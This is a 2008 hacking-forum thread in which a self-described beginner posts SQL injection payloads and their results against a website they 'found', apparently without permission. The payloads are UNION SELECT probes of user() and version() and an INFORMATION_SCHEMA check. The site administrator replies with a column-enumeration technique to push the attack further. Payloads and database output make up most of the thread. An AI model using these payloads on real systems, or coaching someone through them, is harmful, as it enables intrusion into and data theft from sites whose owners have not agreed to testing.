ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2008-05-30 19:22:54

chedda
Member
Registered: 2008-05-30
Posts: 1

Help with sql injection

Ok I am fairly new at sql injection and hacking in general. I have found a website that I believe to be vulnerable, but still having some issues, so far this is what I have found;

news.php3?id=-1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1: 1064

news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,user()/*

root@localhost

news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,version()/*

4.1.20

So I have figured out that its possibly vulnerable and the version its running and the root directory, but I was unsure where to go after that. I read over the tutorial on this website about sql injection and found then tried the follow;

news.php3?id=-1' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='users') AND ''='

Access denied for user 'host'@'localhost' to database 'INFORMATION_SCHEMA': 1044

If I understood the tutorial correct that command is to attempt to figure out the databases name. So naturally I tried and changed the name of the database and keep receive the same error. Is this because I am just not getting the name right or is that error indicating something else?

Offline

#2 2008-05-31 04:17:54

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Help with sql injection

damn, it looks like the information schema is blocked, that always makes things harder. You seem to know quite a lot about SQL already. SQL injections are usually all about guess work. You can start by getting the number of table columns. start with<br /><br />

news.php3?id=-1' UNION ALL SELECT null --

<br /><br />then keep adding nulls, e.g. <br /><br />

news.php3?id=-1' UNION ALL SELECT null,null --

<br /><br />until you get an error message. when you get the error you know the previous was the number of columns the table has. then we can look at using wildcards (% symbols.) I am not a complete expert in this field but i can try. <br /><br />ps also check out tutorial #18 on this site.


Site admin

Offline

Board footer

Powered by FluxBB